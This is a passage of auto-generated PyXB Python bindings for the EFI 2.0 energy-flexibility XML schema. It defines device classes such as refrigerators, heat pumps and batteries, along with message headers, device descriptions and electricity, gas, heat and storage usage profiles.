_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 938, 1)
_Documentation = None
DeviceClass._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=DeviceClass, enum_prefix=None)
DeviceClass.Refrigerator = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Refrigerator', tag='Refrigerator')
DeviceClass.Freezer = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Freezer', tag='Freezer')
DeviceClass.Water_Cooler = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Water Cooler', tag='Water_Cooler')
DeviceClass.Water_Heater = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Water Heater', tag='Water_Heater')
DeviceClass.Washing_Machine = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Washing Machine', tag='Washing_Machine')
DeviceClass.Clothes_Dryer = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Clothes Dryer', tag='Clothes_Dryer')
DeviceClass.Combo_Washer_Dryer = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Combo Washer Dryer', tag='Combo_Washer_Dryer')
DeviceClass.Drying_Cabinet = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Drying Cabinet', tag='Drying_Cabinet')
DeviceClass.Dishwasher = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Dishwasher', tag='Dishwasher')
DeviceClass.Heatpump = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Heatpump', tag='Heatpump')
DeviceClass.Micro_CHP = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Micro-CHP', tag='Micro_CHP')
DeviceClass.Stationary_Battery = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Stationary Battery', tag='Stationary_Battery')
DeviceClass.Electrical_Vehicle = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Electrical Vehicle', tag='Electrical_Vehicle')
DeviceClass.PV_Panel = DeviceClass._CF_enumeration.addEnumeration(unicode_value='PV Panel', tag='PV_Panel')
DeviceClass.Windmill = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Windmill', tag='Windmill')
DeviceClass.Solar_Collector = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Solar Collector', tag='Solar_Collector')
DeviceClass.Air_Conditioner = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Air Conditioner', tag='Air_Conditioner')
DeviceClass.Ventilation = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Ventilation', tag='Ventilation')
DeviceClass.Air_Quality_Appliance = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Air Quality Appliance', tag='Air_Quality_Appliance')
DeviceClass.Gas_Geater = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Gas Geater', tag='Gas_Geater')
DeviceClass.Floor_Heating = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Floor Heating', tag='Floor_Heating')
DeviceClass.Generator = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Generator', tag='Generator')
DeviceClass.Miscellaneous = DeviceClass._CF_enumeration.addEnumeration(unicode_value='Miscellaneous', tag='Miscellaneous')
DeviceClass._InitializeFacetMap(DeviceClass._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'DeviceClass', DeviceClass)
_module_typeBindings.DeviceClass = DeviceClass
# Atomic simple type: {http://www.flexiblepower.org/efi-2}Identifier
class Identifier (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Identifier')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 965, 1)
_Documentation = None
Identifier._CF_pattern = pyxb.binding.facets.CF_pattern()
Identifier._CF_pattern.addPattern(pattern='[a-zA-Z0-9\\-_:]{2,64}')
Identifier._InitializeFacetMap(Identifier._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'Identifier', Identifier)
_module_typeBindings.Identifier = Identifier
# Complex type {http://www.flexiblepower.org/efi-2}EfiMessage with content type ELEMENT_ONLY
class EfiMessage (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}EfiMessage with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'EfiMessage')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 22, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}header uses Python identifier header
__header = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'header'), 'header', '__httpwww_flexiblepower_orgefi_2_EfiMessage_httpwww_flexiblepower_orgefi_2header', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3), )
header = property(__header.value, __header.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}efiVersion uses Python identifier efiVersion
__efiVersion = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'efiVersion'), 'efiVersion', '__httpwww_flexiblepower_orgefi_2_EfiMessage_httpwww_flexiblepower_orgefi_2efiVersion', pyxb.binding.datatypes.string, fixed=True, unicode_default='2.0', required=True)
__efiVersion._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 33, 2)
__efiVersion._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 33, 2)
efiVersion = property(__efiVersion.value, __efiVersion.set, None, None)
_ElementMap.update({
__header.name() : __header
})
_AttributeMap.update({
__efiVersion.name() : __efiVersion
})
_module_typeBindings.EfiMessage = EfiMessage
Namespace.addCategoryObject('typeBinding', 'EfiMessage', EfiMessage)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 25, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}efiResourceId uses Python identifier efiResourceId
__efiResourceId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'efiResourceId'), 'efiResourceId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_httpwww_flexiblepower_orgefi_2efiResourceId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 27, 6), )
efiResourceId = property(__efiResourceId.value, __efiResourceId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}timestamp uses Python identifier timestamp
__timestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timestamp'), 'timestamp', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_httpwww_flexiblepower_orgefi_2timestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 28, 6), )
timestamp = property(__timestamp.value, __timestamp.set, None, None)
_ElementMap.update({
__efiResourceId.name() : __efiResourceId,
__timestamp.name() : __timestamp
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON = CTD_ANON
# Complex type {http://www.flexiblepower.org/efi-2}DeviceDescription with content type ELEMENT_ONLY
class DeviceDescription (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}DeviceDescription with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DeviceDescription')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 35, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}deviceClass uses Python identifier deviceClass
__deviceClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'deviceClass'), 'deviceClass', '__httpwww_flexiblepower_orgefi_2_DeviceDescription_httpwww_flexiblepower_orgefi_2deviceClass', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 37, 3), )
deviceClass = property(__deviceClass.value, __deviceClass.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}serialNumber uses Python identifier serialNumber
__serialNumber = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'serialNumber'), 'serialNumber', '__httpwww_flexiblepower_orgefi_2_DeviceDescription_httpwww_flexiblepower_orgefi_2serialNumber', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 38, 3), )
serialNumber = property(__serialNumber.value, __serialNumber.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}label uses Python identifier label
__label = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_DeviceDescription_httpwww_flexiblepower_orgefi_2label', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 39, 3), )
label = property(__label.value, __label.set, None, None)
_ElementMap.update({
__deviceClass.name() : __deviceClass,
__serialNumber.name() : __serialNumber,
__label.name() : __label
})
_AttributeMap.update({
})
_module_typeBindings.DeviceDescription = DeviceDescription
Namespace.addCategoryObject('typeBinding', 'DeviceDescription', DeviceDescription)
# Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributes with content type EMPTY
class ProbabilityAttributes (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ProbabilityAttributes with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ProbabilityAttributes')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 130, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}the68PPRLower uses Python identifier the68PPRLower
__the68PPRLower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the68PPRLower'), 'the68PPRLower', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the68PPRLower', pyxb.binding.datatypes.double, required=True)
__the68PPRLower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 131, 2)
__the68PPRLower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 131, 2)
the68PPRLower = property(__the68PPRLower.value, __the68PPRLower.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}the95PPRLower uses Python identifier the95PPRLower
__the95PPRLower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the95PPRLower'), 'the95PPRLower', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the95PPRLower', pyxb.binding.datatypes.double, required=True)
__the95PPRLower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 132, 2)
__the95PPRLower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 132, 2)
the95PPRLower = property(__the95PPRLower.value, __the95PPRLower.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}expected uses Python identifier expected
__expected = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'expected'), 'expected', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2expected', pyxb.binding.datatypes.double, required=True)
__expected._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 133, 2)
__expected._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 133, 2)
expected = property(__expected.value, __expected.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}the95PPRUpper uses Python identifier the95PPRUpper
__the95PPRUpper = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the95PPRUpper'), 'the95PPRUpper', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the95PPRUpper', pyxb.binding.datatypes.double, required=True)
__the95PPRUpper._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 134, 2)
__the95PPRUpper._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 134, 2)
the95PPRUpper = property(__the95PPRUpper.value, __the95PPRUpper.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}the68PPRUpper uses Python identifier the68PPRUpper
__the68PPRUpper = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'the68PPRUpper'), 'the68PPRUpper', '__httpwww_flexiblepower_orgefi_2_ProbabilityAttributes_httpwww_flexiblepower_orgefi_2the68PPRUpper', pyxb.binding.datatypes.double, required=True)
__the68PPRUpper._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 135, 2)
__the68PPRUpper._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 135, 2)
the68PPRUpper = property(__the68PPRUpper.value, __the68PPRUpper.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__the68PPRLower.name() : __the68PPRLower,
__the95PPRLower.name() : __the95PPRLower,
__expected.name() : __expected,
__the95PPRUpper.name() : __the95PPRUpper,
__the68PPRUpper.name() : __the68PPRUpper
})
_module_typeBindings.ProbabilityAttributes = ProbabilityAttributes
Namespace.addCategoryObject('typeBinding', 'ProbabilityAttributes', ProbabilityAttributes)
# Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProfile with content type ELEMENT_ONLY
class StorageUsageProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageUsageProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 144, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
__element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_StorageUsageProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 146, 3), )
element = property(__element.value, __element.set, None, None)
_ElementMap.update({
__element.name() : __element
})
_AttributeMap.update({
})
_module_typeBindings.StorageUsageProfile = StorageUsageProfile
Namespace.addCategoryObject('typeBinding', 'StorageUsageProfile', StorageUsageProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 147, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON__httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 148, 5)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 148, 5)
duration = property(__duration.value, __duration.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}usageRate uses Python identifier usageRate
__usageRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'usageRate'), 'usageRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON__httpwww_flexiblepower_orgefi_2usageRate', pyxb.binding.datatypes.double, required=True)
__usageRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 149, 5)
__usageRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 149, 5)
usageRate = property(__usageRate.value, __usageRate.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration,
__usageRate.name() : __usageRate
})
_module_typeBindings.CTD_ANON_ = CTD_ANON_
# Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProbabilityProfile with content type ELEMENT_ONLY
class StorageUsageProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageUsageProbabilityProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageUsageProbabilityProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 154, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}usageRateElement uses Python identifier usageRateElement
__usageRateElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageRateElement'), 'usageRateElement', '__httpwww_flexiblepower_orgefi_2_StorageUsageProbabilityProfile_httpwww_flexiblepower_orgefi_2usageRateElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 156, 3), )
usageRateElement = property(__usageRateElement.value, __usageRateElement.set, None, None)
_ElementMap.update({
__usageRateElement.name() : __usageRateElement
})
_AttributeMap.update({
})
_module_typeBindings.StorageUsageProbabilityProfile = StorageUsageProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'StorageUsageProbabilityProfile', StorageUsageProbabilityProfile)
# Complex type {http://www.flexiblepower.org/efi-2}ElectricityProfile with content type ELEMENT_ONLY
class ElectricityProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ElectricityProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ElectricityProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 159, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
__element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_ElectricityProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 161, 3), )
element = property(__element.value, __element.set, None, None)
_ElementMap.update({
__element.name() : __element
})
_AttributeMap.update({
})
_module_typeBindings.ElectricityProfile = ElectricityProfile
Namespace.addCategoryObject('typeBinding', 'ElectricityProfile', ElectricityProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 162, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_2_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 163, 5)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 163, 5)
duration = property(__duration.value, __duration.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}power uses Python identifier power
__power = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'power'), 'power', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_2_httpwww_flexiblepower_orgefi_2power', pyxb.binding.datatypes.double, required=True)
__power._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 164, 5)
__power._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 164, 5)
power = property(__power.value, __power.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration,
__power.name() : __power
})
_module_typeBindings.CTD_ANON_2 = CTD_ANON_2
# Complex type {http://www.flexiblepower.org/efi-2}ElectricityProbabilityProfile with content type ELEMENT_ONLY
class ElectricityProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ElectricityProbabilityProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ElectricityProbabilityProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 169, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}powerElement uses Python identifier powerElement
__powerElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'powerElement'), 'powerElement', '__httpwww_flexiblepower_orgefi_2_ElectricityProbabilityProfile_httpwww_flexiblepower_orgefi_2powerElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 171, 3), )
powerElement = property(__powerElement.value, __powerElement.set, None, None)
_ElementMap.update({
__powerElement.name() : __powerElement
})
_AttributeMap.update({
})
_module_typeBindings.ElectricityProbabilityProfile = ElectricityProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'ElectricityProbabilityProfile', ElectricityProbabilityProfile)
# Complex type {http://www.flexiblepower.org/efi-2}GasProfile with content type ELEMENT_ONLY
class GasProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}GasProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'GasProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 174, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
__element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_GasProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 176, 3), )
element = property(__element.value, __element.set, None, None)
_ElementMap.update({
__element.name() : __element
})
_AttributeMap.update({
})
_module_typeBindings.GasProfile = GasProfile
Namespace.addCategoryObject('typeBinding', 'GasProfile', GasProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 177, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_3_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 178, 5)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 178, 5)
duration = property(__duration.value, __duration.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
__flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_3_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double, required=True)
__flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 179, 5)
__flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 179, 5)
flowRate = property(__flowRate.value, __flowRate.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration,
__flowRate.name() : __flowRate
})
_module_typeBindings.CTD_ANON_3 = CTD_ANON_3
# Complex type {http://www.flexiblepower.org/efi-2}GasProbabilityProfile with content type ELEMENT_ONLY
class GasProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}GasProbabilityProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'GasProbabilityProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 184, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}flowRateElement uses Python identifier flowRateElement
__flowRateElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flowRateElement'), 'flowRateElement', '__httpwww_flexiblepower_orgefi_2_GasProbabilityProfile_httpwww_flexiblepower_orgefi_2flowRateElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 186, 3), )
flowRateElement = property(__flowRateElement.value, __flowRateElement.set, None, None)
_ElementMap.update({
__flowRateElement.name() : __flowRateElement
})
_AttributeMap.update({
})
_module_typeBindings.GasProbabilityProfile = GasProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'GasProbabilityProfile', GasProbabilityProfile)
# Complex type {http://www.flexiblepower.org/efi-2}HeatProfile with content type ELEMENT_ONLY
class HeatProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}HeatProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'HeatProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 189, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
__element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_HeatProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 191, 3), )
element = property(__element.value, __element.set, None, None)
